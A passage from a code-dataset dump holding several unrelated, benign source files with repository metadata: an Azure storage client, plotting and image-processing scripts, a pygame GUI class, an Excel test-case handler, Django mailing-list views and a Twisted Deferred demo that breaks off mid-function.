# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import StorageManagementClientConfiguration
from .operations_async import Operations
from .operations_async import SkusOperations
from .operations_async import StorageAccountsOperations
from .operations_async import UsagesOperations
from .operations_async import ManagementPoliciesOperations
from .operations_async import PrivateEndpointConnectionsOperations
from .operations_async import PrivateLinkResourcesOperations
from .operations_async import ObjectReplicationPoliciesOperations
from .operations_async import EncryptionScopesOperations
from .operations_async import BlobServicesOperations
from .operations_async import BlobContainersOperations
from .operations_async import FileServicesOperations
from .operations_async import FileSharesOperations
from .operations_async import QueueServicesOperations
from .operations_async import QueueOperations
from .operations_async import TableServicesOperations
from .operations_async import TableOperations
from .. import models
class StorageManagementClient(object):
"""The Azure Storage Management API.
:ivar operations: Operations operations
:vartype operations: azure.mgmt.storage.v2019_06_01.aio.operations_async.Operations
:ivar skus: SkusOperations operations
:vartype skus: azure.mgmt.storage.v2019_06_01.aio.operations_async.SkusOperations
:ivar storage_accounts: StorageAccountsOperations operations
:vartype storage_accounts: azure.mgmt.storage.v2019_06_01.aio.operations_async.StorageAccountsOperations
:ivar usages: UsagesOperations operations
:vartype usages: azure.mgmt.storage.v2019_06_01.aio.operations_async.UsagesOperations
:ivar management_policies: ManagementPoliciesOperations operations
:vartype management_policies: azure.mgmt.storage.v2019_06_01.aio.operations_async.ManagementPoliciesOperations
:ivar private_endpoint_connections: PrivateEndpointConnectionsOperations operations
:vartype private_endpoint_connections: azure.mgmt.storage.v2019_06_01.aio.operations_async.PrivateEndpointConnectionsOperations
:ivar private_link_resources: PrivateLinkResourcesOperations operations
:vartype private_link_resources: azure.mgmt.storage.v2019_06_01.aio.operations_async.PrivateLinkResourcesOperations
:ivar object_replication_policies: ObjectReplicationPoliciesOperations operations
:vartype object_replication_policies: azure.mgmt.storage.v2019_06_01.aio.operations_async.ObjectReplicationPoliciesOperations
:ivar encryption_scopes: EncryptionScopesOperations operations
:vartype encryption_scopes: azure.mgmt.storage.v2019_06_01.aio.operations_async.EncryptionScopesOperations
:ivar blob_services: BlobServicesOperations operations
:vartype blob_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.BlobServicesOperations
:ivar blob_containers: BlobContainersOperations operations
:vartype blob_containers: azure.mgmt.storage.v2019_06_01.aio.operations_async.BlobContainersOperations
:ivar file_services: FileServicesOperations operations
:vartype file_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.FileServicesOperations
:ivar file_shares: FileSharesOperations operations
:vartype file_shares: azure.mgmt.storage.v2019_06_01.aio.operations_async.FileSharesOperations
:ivar queue_services: QueueServicesOperations operations
:vartype queue_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.QueueServicesOperations
:ivar queue: QueueOperations operations
:vartype queue: azure.mgmt.storage.v2019_06_01.aio.operations_async.QueueOperations
:ivar table_services: TableServicesOperations operations
:vartype table_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.TableServicesOperations
:ivar table: TableOperations operations
:vartype table: azure.mgmt.storage.v2019_06_01.aio.operations_async.TableOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = StorageManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.skus = SkusOperations(
self._client, self._config, self._serialize, self._deserialize)
self.storage_accounts = StorageAccountsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.usages = UsagesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.management_policies = ManagementPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_link_resources = PrivateLinkResourcesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.object_replication_policies = ObjectReplicationPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.encryption_scopes = EncryptionScopesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.blob_services = BlobServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.blob_containers = BlobContainersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.file_services = FileServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.file_shares = FileSharesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.queue_services = QueueServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.queue = QueueOperations(
self._client, self._config, self._serialize, self._deserialize)
self.table_services = TableServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.table = TableOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "StorageManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
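# --- Usage sketch (not part of the generated SDK file) -----------------------
# A minimal, hedged example of how this client might be used. It assumes the
# `azure-identity` package is available and that a real subscription id is
# substituted; the printed attribute is only illustrative.
#
#     import asyncio
#     from azure.identity.aio import DefaultAzureCredential
#
#     async def list_storage_accounts() -> None:
#         async with DefaultAzureCredential() as credential:
#             async with StorageManagementClient(credential, "<subscription-id>") as client:
#                 async for account in client.storage_accounts.list():
#                     print(account.name)
#
#     asyncio.run(list_storage_accounts())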
|
[
"[email protected]"
] | |
4a4d17d3ae6047f3dc96cac26f38a98d54b2c02c
|
ad32c2f9c37158540c6f221794a365b65bfbb02c
|
/lib/S02_onde_progressive.py
|
947b364f2de742fec5dfa689d3d8813b5634ee61
|
[] |
no_license
|
jjfPCSI1/py4phys
|
27bff9cd79e51b88dd926f552bda8c5d623585c0
|
47f9518d9b56e46a873bec9834c98c005a2c5017
|
refs/heads/master
| 2022-08-09T05:14:14.761789 | 2022-08-02T19:34:30 | 2022-08-02T19:34:30 | 22,642,385 | 27 | 18 | null | 2022-02-18T08:03:07 | 2014-08-05T12:21:56 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,016 |
py
|
# coding: utf8
# Unless explicitly stated otherwise below, this work was done by
# Jean-Julien Fleck, physics/IPT teacher in PCSI1 at lycée Kléber.
# You are free to reuse it and modify it to suit your needs.
'''
Illustration of the rightward propagation of a wave of arbitrary shape,
both over time in a spatial profile and across space in a temporal profile.
'''
import numpy as np # For np.linspace, np.exp and np.cos
import matplotlib.pyplot as plt # For the plots
def f(u,k=10):
    '''The wave profile to propagate: a Gaussian multiplied by a cosine.'''
    return np.exp(-3*u**2) * np.cos(k*u-5)
nb_points = 1000 # Number of sampling points for the graph
nb_courbes = 3 # Number of curves to draw
# First, the spatial visualisation
x = np.linspace(-2,2,nb_points) # Sampling in position
t = np.linspace(0,5,nb_courbes) # Look at the profile at different times
c = 0.2 # Propagation speed of the wave
for ti in t:
    fi = f(x-c*ti) # Sample the profile at the various x
    plt.plot(x,fi,label='$t={}$'.format(round(ti,1))) # Plot
# Cosmetics
plt.title('Profil spatial pour differents temps')
plt.xlabel('Position $x$')
plt.ylabel("Profil de l'onde")
plt.legend()
plt.savefig('PNG/S02_onde_progressive_spatial.png')
plt.clf()
# Now the temporal visualisation
t = np.linspace(0,10,nb_points) # Sampling in time
x = np.linspace(0,0.6,nb_courbes) # Look at the profile at different positions
c = 0.2 # Propagation speed of the wave
for xi in x:
    fi = f(xi-c*t) # Sample the profile at the various t
    plt.plot(t,fi,label='$x={}$'.format(round(xi,1))) # Plot
# Cosmetics
plt.title('Profil temporel pour differente positions')
plt.xlabel('Temps $t$')
plt.ylabel("Profil de l'onde")
plt.legend()
plt.savefig('PNG/S02_onde_progressive_temporel.png')
plt.clf()
|
[
"[email protected]"
] | |
7acb737859a8d78bd545e2ef6489badd805c62d3
|
0aa3890c840528e517470207e06c1e7e136ecb43
|
/utils/__init__.py
|
524916b4a9d54c9df3eacaa805632b2aea82db06
|
[] |
no_license
|
solinari27/stockCrawler
|
7aa05cd8a7a18a6286b3bf9fd3512f4138b13951
|
4159e53cba2315b052cf37fddcbdb2dee8e9d094
|
refs/heads/master
| 2023-07-24T21:30:34.290533 | 2019-12-12T15:05:58 | 2019-12-12T15:05:58 | 120,918,787 | 0 | 0 | null | 2023-07-06T21:25:19 | 2018-02-09T14:58:31 |
Python
|
UTF-8
|
Python
| false | false | 119 |
py
|
#!usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author: solinari
@file: __init__.py
@time: 2018/11/04
"""
|
[
"[email protected]"
] | |
c98bf9af78911012a5d580d8fab568dc0dd4d262
|
5aa0e5f32d529c3321c28d37b0a12a8cf69cfea8
|
/client/gui_lib/GUIElement.py
|
9e1b3576bea5c0ed0b0177d38d061da26e549710
|
[] |
no_license
|
sheepsy90/survive
|
26495f1ff2d8247fbb9470882f8be9f5272e7f2c
|
0eddf637be0eacd34415761b78fc2c9d50bc1528
|
refs/heads/master
| 2021-01-09T05:55:16.546762 | 2017-02-03T20:15:28 | 2017-02-03T20:15:28 | 80,864,391 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,463 |
py
|
import pygame
class GUIElement(object):
TEXT = 2
BUTTON = 1
def __init__(self, name, rect):
self.name = name
self.x, self.y, self.width, self.height = rect
self.is_hover = False
self.gui_handler = None
self.focus = False
self.visible = True
self.z_order = 0
self.titleFont = pygame.font.Font('resources/fonts/VENUSRIS.ttf', 64)
def set_zorder(self, order):
self.z_order = order
def get_zorder(self):
return self.z_order
def get_name(self):
return self.name
def set_hover_state(self, mx, my):
if self.x <= mx <= self.width+self.x and self.y <= my <= self.height+self.y:
self.is_hover = True
else:
self.is_hover = False
def update(self, mx, my, mouse_buttons, events):
self.set_hover_state(mx, my)
def get_rect(self):
return pygame.Rect(self.x, self.y, self.width, self.height)
def is_hover_active(self):
return self.is_hover
def draw(self, renderer):
raise NotImplementedError
def register_gui_handler(self, gui_handler):
self.gui_handler = gui_handler
def enable_focus(self):
self.focus = True
def disable_focus(self):
self.focus = False
def has_focus(self):
return self.focus
def set_visible(self, value):
self.visible = value
def is_visible(self):
return self.visible
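# Example: a minimal concrete subclass (our own sketch, not part of the
# original module). GUIElement.draw() raises NotImplementedError, so every
# concrete element must override it. The `renderer` passed to draw() is
# assumed here to be a pygame Surface with a blit() method; the label colour
# is an arbitrary illustration.
class LabelElement(GUIElement):
    def __init__(self, name, rect, text):
        GUIElement.__init__(self, name, rect)
        self.text = text
    def draw(self, renderer):
        if not self.is_visible():
            return
        # Render the label with the font created by the base class and blit it
        surface = self.titleFont.render(self.text, True, (255, 255, 255))
        renderer.blit(surface, (self.x, self.y))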
|
[
"[email protected]"
] | |
45667c5a8f2316218249b7697d3dca26d9f8711e
|
ba8583b784301b2206d9cba3f57c4cc1c969165c
|
/src/data/prepare_dataset.py
|
bbf1df11477eddfd9cf35c8325d3ab688d32214b
|
[] |
no_license
|
tonylibing/tf_classification_framework
|
c8cd0c71badf6cd20a2e87711ebbe89f6f9eceba
|
e08f1b9dc7460a147a704ec099c64785663ce070
|
refs/heads/master
| 2022-04-12T16:16:52.809842 | 2020-03-07T13:26:02 | 2020-03-07T13:26:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,541 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 21 14:12:43 2018
A batch image verification tool
After downloading a large amount of image data, we usually find that some
images cannot be opened, which may be caused by network transmission errors.
Therefore, before using these images, use this tool to verify the image data
and move any unreadable images to the specified path.
@author: as
"""
import os
import sys
import cv2
import numpy as np
import shutil
import warnings
from PIL import Image
import tensorflow as tf
# raise the warning as an exception
warnings.filterwarnings('error')
from utils.config_utils import load_config_file, mkdir_if_nonexist
flags = tf.app.flags
flags.DEFINE_string('config_path', '', 'path of the config file')
FLAGS = flags.FLAGS
# load config file
config_path = FLAGS.config_path
config_dict = load_config_file(config_path)
sys.stdout.flush()
reshape_size = config_dict['DATASET']['IMAGE_SIZE']
src_dir = config_dict['DATASET']['DATASET_ROOT_DIR']
use_channel_normalization = config_dict['DATASET']['USE_CHANNEL_NORMALIZATION']
output_paras = config_dict['OUTPUT']
experiment_base_dir = os.path.join(output_paras['OUTPUT_SAVE_DIR'], output_paras['EXPERIMENT_NAME'])
model_save_dir = os.path.join(experiment_base_dir, 'weights')
result_save_dir = os.path.join(experiment_base_dir, 'result')
error_save_dir = os.path.join(result_save_dir, 'error_format')
mkdir_if_nonexist(model_save_dir, raise_error=False)
mkdir_if_nonexist(result_save_dir, raise_error=False)
mkdir_if_nonexist(error_save_dir, raise_error=False)
# get datast mean_var file path
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
cnt = 0
rm_cnt = 0
rgb_list = []
for root, dirs, files in os.walk(src_dir):
for file_name in files:
cnt += 1
if cnt % 1000 == 0:
print(cnt)
sys.stdout.flush()
src_file = os.path.join(root, file_name)
dst_file = os.path.join(error_save_dir, file_name)
try:
# check by PIL Image
img_pil = Image.open(src_file)
# check by opencv
img_cv = cv2.imread(src_file)
if type(img_cv) != np.ndarray:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('error when read by cv2!', file_name)
sys.stdout.flush()
continue
# check channel number
shape = img_cv.shape
if len(shape) == 3:
# this image is valid, reshape it
height, width = shape[:2]
if width > height:
height = int(height * reshape_size / width)
width = reshape_size
else:
width = int(width * reshape_size / height)
height = reshape_size
img_reshape = cv2.resize(img_cv, (width, height), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(src_file, img_reshape)
# compute channel mean value
r_mean = np.mean(img_reshape[:,:,2])
g_mean = np.mean(img_reshape[:,:,1])
b_mean = np.mean(img_reshape[:,:,0])
rgb_list.append([r_mean, g_mean, b_mean])
elif len(shape) == 2:
# change channel num to 3
img_bgr = cv2.cvtColor(img_cv, cv2.COLOR_GRAY2BGR)
#img_bgr = cv2.merge((img_cv, img_cv, img_cv))
cv2.imwrite(src_file, img_bgr)
print("change {} from gray to rgb".format(file_name))
sys.stdout.flush()
# compute channel mean value
mean_value = np.mean(img_cv)
rgb_list.append([mean_value, mean_value, mean_value])
else:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('channel number error!', file_name)
sys.stdout.flush()
except Warning:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('A warning raised!', file_name)
sys.stdout.flush()
except:
shutil.move(src_file, dst_file)
#os.remove(src_file)
rm_cnt += 1
print('Error occured!', file_name)
sys.stdout.flush()
if use_channel_normalization == 0:
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
with open(mean_var_file, 'w') as writer:
writer.write("R_mean_std:" + str(128) + ':' + str(128) + '\n')
writer.write("G_mean_std:" + str(128) + ':' + str(128) + '\n')
writer.write("B_mean_std:" + str(128) + ':' + str(128) + '\n')
else:
# compute dataset channel mean and std
rgb_list = np.array(rgb_list)
r_mean = np.mean(rgb_list[:,2])
g_mean = np.mean(rgb_list[:,1])
b_mean = np.mean(rgb_list[:,0])
r_std = np.std(rgb_list[:,2])
g_std = np.std(rgb_list[:,1])
b_std = np.std(rgb_list[:,0])
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
with open(mean_var_file, 'w') as writer:
writer.write("R_mean_std:" + str(r_mean) + ':' + str(r_std) + '\n')
writer.write("G_mean_std:" + str(g_mean) + ':' + str(g_std) + '\n')
writer.write("B_mean_std:" + str(b_mean) + ':' + str(b_std) + '\n')
print('finish')
print("error number {}".format(rm_cnt))
|
[
"[email protected]"
] | |
0f30f9125763d9b2ac1d7dec0a5bd1a1859b038b
|
01341e6b4e13679f3a78bd02f7156cb52d11d8d8
|
/utils_fourier.py
|
6f311983041114e5ad36b3ca37ad29ee24dfbbf4
|
[
"MIT"
] |
permissive
|
majedelhelou/PriorLearning
|
864b1499ac993b730b90e3b700b3d59795865818
|
f66d25993c3b99dd31d9d62abeb3e0a5623e034d
|
refs/heads/master
| 2020-09-13T09:22:45.011770 | 2020-01-11T23:50:10 | 2020-01-11T23:50:10 | 222,724,499 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,159 |
py
|
from utils_deblur import psf2otf, otf2psf
import numpy as np
def deblurring_estimate(Y, X_l, k_l, reg_weight=1):
'''
Operation: solve for Z that minimizes: ||Y-k_l*Z||**2 + reg_weight * ||Z-X_l||**2
Inputs:
2D images Y and X_l (Gray or multichannel)
k_l (blur kernel for the low-res image, should be normalized to 1)
reg_weight (weight of the reg term ||Z-X_l||**2)
Outputs:
Z image that minimizes the optimization loss
'''
# Convert inputs to Fourier domain
X_l_Freq = np.fft.fft2(X_l, axes=[0, 1])
Y_Freq = np.fft.fft2(Y, axes=[0, 1])
k_l_Freq = psf2otf(k_l, Y.shape[:2])
if X_l_Freq.ndim == 3:
k_l_Freq = np.repeat(k_l_Freq[:, :, np.newaxis], X_l_Freq.shape[2], axis=2)
    # Solve for Z in the Fourier domain (the regularization only affects the denominator)
num = k_l_Freq.conjugate() * Y_Freq + reg_weight * X_l_Freq
den = np.abs(k_l_Freq)**2 + reg_weight # Fourier transform of k_l transpose * k_l + reg_weight
Z_Freq = num / den
    # Convert back to the spatial domain
Z = np.real(np.fft.ifft2(Z_Freq, axes=(0, 1)))
return Z
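# A minimal usage sketch (ours, not part of the original module): build a tiny
# synthetic example and run the estimator. The box-blur kernel and the
# regularization weight below are arbitrary illustrative choices.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    X_l = rng.rand(64, 64)              # prior / low-res estimate
    k_l = np.ones((5, 5)) / 25.0        # normalized 5x5 box blur kernel
    # Synthesize a blurred observation Y by circular convolution in Fourier space
    Y = np.real(np.fft.ifft2(psf2otf(k_l, X_l.shape) * np.fft.fft2(X_l)))
    Z = deblurring_estimate(Y, X_l, k_l, reg_weight=0.05)
    print('output shape:', Z.shape)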
|
[
"[email protected]"
] | |
7416cbc73d6ba31ae6410ac8ec422a06a219270e
|
4ca5ad12b083ed7dd8d5132bc9e66d4dea326dda
|
/WebClass/web_11_自动化测试框架V1/common/handle_excel.py
|
a06471baff2cf97acf86513f147a3ab66d7e499b
|
[] |
no_license
|
ybsgithup/Code
|
7b279f68d96908f2ae44d21e3da335110bc308e4
|
bbc2018e6a7ce7293c5effb409d7a6279033ae15
|
refs/heads/master
| 2022-11-23T23:02:48.908126 | 2020-07-27T04:24:38 | 2020-07-27T04:24:38 | 276,266,634 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,465 |
py
|
import os
from openpyxl import load_workbook
class Testcase:
pass
class HandleExcel:
def __init__(self, filename, sheetname=None):
self.filename = filename
self.sheetname = sheetname
def read_data(self):
"""
        Read the test-case data from the workbook.
        :return: a list of Testcase objects
"""
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
testcases_list = []
        headers_list = []  # holds the header row values
        for row in range(1, ws.max_row + 1):
            # holds the test-case data of the current row
            # one_row_dict = {}
            one_testcase = Testcase()  # create a test-case object
            for column in range(1, ws.max_column + 1):
                one_cell_value = ws.cell(row, column).value
                if row == 1:
                    # headers_list.append(one_cell_value)
                    # convert the header cell to a string and append it to headers_list
                    headers_list.append(str(one_cell_value))
                else:
                    # look up the header string for this column
                    key = headers_list[column - 1]
                    # one_row_dict[key] = one_cell_value
                    if key == "actual":
                        # record the column number of the actual-response column as actual_column
                        setattr(one_testcase, "actual_column", column)
                    elif key == "result":
                        # record the column number of the test-result column as result_column
                        setattr(one_testcase, "result_column", column)
                    setattr(one_testcase, key, one_cell_value)
            if row != 1:
                # testcases_list.append(one_row_dict)
                # record the row number of the current test case as the row attribute
                setattr(one_testcase, "row", row)
testcases_list.append(one_testcase)
return testcases_list
'''
def write_data(self, row, column, data):
"""
        Write operation
        :param row: the row to write to
        :param column: the column to write to
        :param data: the data to be written
        :return:
        """
        # Write the data into Excel; do not share a Workbook object with the read operation.
        # If the same Workbook object is reused, only the last write succeeds and unexpected results occur.
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
        # First way of writing:
        # one_cell = ws.cell(row, column)
        # one_cell.value = data
        # Second way of writing:
ws.cell(row, column, value=data)
wb.save(self.filename)
'''
def write_data(self, one_testcase, actual_value, result_value):
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
        # Second way of writing:
ws.cell(one_testcase.row, one_testcase.actual_column, value=actual_value)
ws.cell(one_testcase.row, one_testcase.result_column, value=result_value)
wb.save(self.filename)
if __name__ == '__main__':
excel_filename = "../data/test_case.xlsx"
sheet_name = "cases_error"
do_excel = HandleExcel(excel_filename, sheet_name)
do_excel.read_data()
pass
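# A hedged sketch of how a test runner might consume HandleExcel end-to-end.
# The attribute names url/data/expected and the send_request() helper are
# hypothetical placeholders driven by the spreadsheet headers, not part of
# this module:
#
#     do_excel = HandleExcel("../data/test_case.xlsx", "cases_error")
#     for case in do_excel.read_data():
#         actual = send_request(case.url, case.data)              # hypothetical HTTP call
#         result = "PASS" if str(actual) == str(case.expected) else "FAIL"
#         do_excel.write_data(case, str(actual), result)          # fills the actual/result columns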
|
[
"[email protected]"
] | |
9ff12a83fa349c141961c33c8bda172be333ee74
|
89108805110edac6d07de41130a9bc45d62efb9d
|
/mailinglist_registration/backends/messages/views.py
|
7e5ac56aa132db7d8dfe58368d69d8731b85b4c5
|
[
"BSD-3-Clause"
] |
permissive
|
danielpatrickdotdev/django-mailinglist-registration
|
7824aaa6232ebfe5de5e3dc65a19cc707b6b4686
|
756c4ac2052063249b66eaa4c153694a5fb3eba1
|
refs/heads/master
| 2021-05-27T17:56:54.917761 | 2013-07-13T12:29:01 | 2013-07-13T12:29:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,919 |
py
|
from django.conf import settings
from django.shortcuts import redirect
from django.contrib.sites.models import RequestSite, Site
from django.contrib import messages
from django.views.generic.base import TemplateView
from mailinglist_registration import signals
from mailinglist_registration.models import RegistrationProfile, Subscriber
from mailinglist_registration.views import ActivationView as BaseActivationView
from mailinglist_registration.views import RegistrationView as BaseRegistrationView
class RegistrationView(BaseRegistrationView):
def register(self, request, **cleaned_data):
"""
Given an email address, register a new subscriber, which will
initially be inactive.
Along with the new ``Subscriber`` object, a new
``mailinglist_registration.models.RegistrationProfile`` will be created,
tied to that ``Subscriber``, containing the activation key which
will be used for this account.
An email will be sent to the supplied email address; this
email should contain an activation link. The email will be
rendered using two templates. See the documentation for
``RegistrationProfile.send_activation_email()`` for
information about these templates and the contexts provided to
them.
After the ``Subscriber`` and ``RegistrationProfile`` are created and
the activation email is sent, the signal
``mailinglist_registration.signals.subscriber_registered`` will
be sent, with the new ``Subscriber`` as the keyword argument
``subscriber`` and the class of this backend as the sender.
"""
email = cleaned_data['email']
if Site._meta.installed:
site = Site.objects.get_current()
else:
site = RequestSite(request)
subscriber = RegistrationProfile.objects.create_inactive_subscriber(email, site)
signals.subscriber_registered.send(sender=self.__class__,
subscriber=subscriber,
request=request)
return subscriber
def registration_allowed(self, request):
"""
In order to keep this backend simple, registration is always open.
"""
return True
def form_valid(self, request, form):
new_subscriber = self.register(request, **form.cleaned_data)
success_url = self.get_success_url(request, new_subscriber)
messages.info(self.request,"Thanks for signing up to our updates! Please check your emails to confirm your email address.")
# success_url may be a simple string, or a tuple providing the
# full argument set for redirect(). Attempting to unpack it
# tells us which one it is.
try:
to, args, kwargs = success_url
return redirect(to, *args, **kwargs)
except ValueError:
return redirect(success_url)
class ActivationView(TemplateView):
"""
Base class for subscriber activation views.
"""
success_url = None
http_method_names = ['get']
def get(self, request, *args, **kwargs):
activated_subscriber = self.activate(request, *args, **kwargs)
if activated_subscriber:
messages.success(request,"Your email address has been confirmed. Thank you for subscribing to our updates!")
success_url = self.get_success_url(request, activated_subscriber)
try:
to, args, kwargs = success_url
return redirect(to, *args, **kwargs)
except ValueError:
return redirect(success_url)
else:
messages.error(request,"Hmm. Something went wrong somewhere. Maybe the activation link expired?")
success_url = self.get_success_url(request, activated_subscriber)
return redirect(success_url)
def activate(self, request, activation_key):
"""
        Given an activation key, look up and activate the subscriber
account corresponding to that key (if possible).
After successful activation, the signal
``mailinglist_registration.signals.subscriber_activated`` will be sent, with the
newly activated ``Subscriber`` as the keyword argument ``subscriber`` and
the class of this backend as the sender.
"""
activated_subscriber = RegistrationProfile.objects.activate_subscriber(activation_key)
if activated_subscriber:
signals.subscriber_activated.send(sender=self.__class__,
subscriber=activated_subscriber,
request=request)
return activated_subscriber
def get_success_url(self, request, subscriber):
return self.success_url
class DeRegistrationView(TemplateView):
success_url = None
def get(self, request, deactivation_key, *args, **kwargs):
"""
        Given a deactivation key, look up and deactivate the subscriber
account corresponding to that key (if possible).
After successful deactivation, the signal
``mailinglist_registration.signals.subscriber_deactivated`` will be sent, with the
email of the deactivated ``Subscriber`` as the keyword argument ``email`` and
the class of this backend as the sender.
"""
email = Subscriber.objects.deactivate_subscriber(deactivation_key)
if email:
signals.subscriber_deactivated.send(sender=self.__class__,
email=email,
request=request)
messages.info(request,"Your email address has been removed from our mailing list.")
else:
messages.error(request,"Are you sure you typed that URL correctly?")
return redirect(self.success_url)
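# A hedged sketch (ours, not part of this backend) of how these views might be
# wired into a project's urls.py. The URL patterns, names and success_url
# values are illustrative assumptions only:
#
#     from django.urls import path, re_path
#     from mailinglist_registration.backends.messages import views
#
#     urlpatterns = [
#         path('subscribe/', views.RegistrationView.as_view(), name='subscribe'),
#         re_path(r'^activate/(?P<activation_key>\w+)/$',
#                 views.ActivationView.as_view(success_url='/'), name='activate'),
#         re_path(r'^unsubscribe/(?P<deactivation_key>\w+)/$',
#                 views.DeRegistrationView.as_view(success_url='/'), name='unsubscribe'),
#     ]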
|
[
"[email protected]"
] | |
77842a6aee9b5ded6310e374e78ec44dfddb45bd
|
d2cb930ed5df0b1b5f7944e00f6f884bf014803d
|
/douban/twisted-demo.py
|
fcf677fc5cecf53c84cde258c7d3baea35271f91
|
[] |
no_license
|
sixDegree/python-scrapy-demo
|
3cae4298b01edab65449cfe9af56b2fa59f4c07d
|
b66530e54156be8c7877f1fc4d497fd497b6fdda
|
refs/heads/master
| 2020-06-17T03:16:23.038061 | 2019-07-08T09:25:15 | 2019-07-08T09:25:15 | 195,777,787 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,184 |
py
|
from twisted.internet import reactor  # event loop (stops automatically once all sockets have been removed)
from twisted.internet import defer    # defer.Deferred: a special socket-like object (must be fired and removed manually)
from twisted.internet import task
import treq  # used to send asynchronous requests; returns Deferred objects
import time
# Deferred mechanism:
# A Deferred is a deferred object representing a value that cannot be obtained immediately
def demo_defer1():
d = defer.Deferred()
print("called:", d.called) # False
print("call...")
d.callback("Hello")
print("called:", d.called) # True
print("result:", d.result) # Hello
def demo_defer2():
def done(v):
print("done called")
return "Hello " + v
d = defer.Deferred()
d.addCallback(done)
print("called:", d.called) # False
print("call...")
d.callback("Tom")
print("called:", d.called) # True
print("result:", d.result) # Hello Tom
def demo_defer3():
def status(*ds):
return [(getattr(d, 'result', 'N/A'), len(d.callbacks)) for d in ds]
def b_callback(arg):
print("b_callback called with arg =", arg)
return b
def on_done(arg):
print("on_done called with arg =", arg)
return arg
a = defer.Deferred()
b = defer.Deferred()
a.addCallback(b_callback).addCallback(on_done)
print(status(a, b)) # [('N/A', 2), ('N/A', 0)]
a.callback(3) # b_callback called with arg = 3
print(status(a, b)) # [(<Deferred at 0x1047a0da0>, 1), ('N/A', 1)]
b.callback(4) # on_done called with arg = 4
print(status(a, b)) # [(4, 0), (None, 0)]
def demo_defer4():
def status(*ds):
return [(getattr(d, 'result', 'N/A'), len(d.callbacks)) for d in ds]
def b_callback(arg):
print("b_callback called with arg =", arg)
return b
def on_done(arg):
print("on_done called with arg =", arg)
return arg
a = defer.Deferred()
b = defer.Deferred()
a.addCallback(b_callback).addCallback(on_done)
print(status(a, b)) # [('N/A', 2), ('N/A', 0)]
b.callback(4)
print(status(a, b)) # [('N/A', 2), (4, 0)]
a.callback(3) # b_callback called with arg = 3
# on_done called with arg = 4
print(status(a, b)) # [(4, 0), (None, 0)]
def demo_defer5():
def on_done(arg):
print("on_done called with arg =", arg)
return arg
dfds = [defer.Deferred() for i in range(5)]
defer.DeferredList(dfds).addCallback(on_done)
for i in range(5):
dfds[i].callback(i)
# on_done called with arg = [(True, 0), (True, 1), (True, 2), (True, 3), (True, 4)]
    # on_done is only called after every Deferred in the list has fired (had `callback(...)` called on it)
def demo_reactor1():
def done(arg):
print("Done", arg)
def defer_task():
print("Start")
d = defer.Deferred()
time.sleep(3)
d.callback("123")
return d
def stop():
reactor.stop()
defer_task().addCallback(done)
reactor.callLater(0, stop)
reactor.run()
def demo_reactor2():
def done(arg):
print("Done", arg)
def all_done(arg):
print("All done", arg)
def defer_task(i):
print("Start", i)
d = defer.Deferred()
d.addCallback(done)
time.sleep(2)
d.callback(i)
return d
def stop():
print("Stop reactor")
reactor.stop()
